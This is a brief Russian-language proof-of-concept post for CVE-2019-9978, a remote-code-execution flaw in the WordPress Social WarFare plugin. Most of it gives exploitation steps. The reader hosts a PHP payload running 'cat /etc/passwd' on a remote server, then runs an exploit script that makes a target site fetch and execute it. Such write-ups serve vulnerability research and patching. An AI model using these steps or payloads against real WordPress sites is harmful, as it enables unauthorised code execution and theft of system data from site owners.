
CVE-2019-9978 - (PoC) RCE в плагине Social WarFare (<=3.5.2)
CVE-2019-9978 - (PoC) RCE в плагине Social WarFare (<=3.5.2)
Неаутентифицированное удаленное выполнение кода обнаружено в функциональности, которая обрабатывает импорт настроек. Пользователь может использовать RFI для RCE.
Скопируйте следующий payload:
<pre>system('cat /etc/passwd')</pre>
Сохраните его с именем файла: payload.txt и загрузите его на сервер. URI должен выглядеть так: http(s)://yoursite.com/payload.txt. Наконец, укажите ваши опции --target и --payload-uri:
$ python cve-2019-9978.py --target http://vulntarget.com \
--payload-uri http://yourpayloadsite.com/payload.txt

Исследователь: Luka Sikic
Ссылка: https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnanccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
Автор: @hash3liZer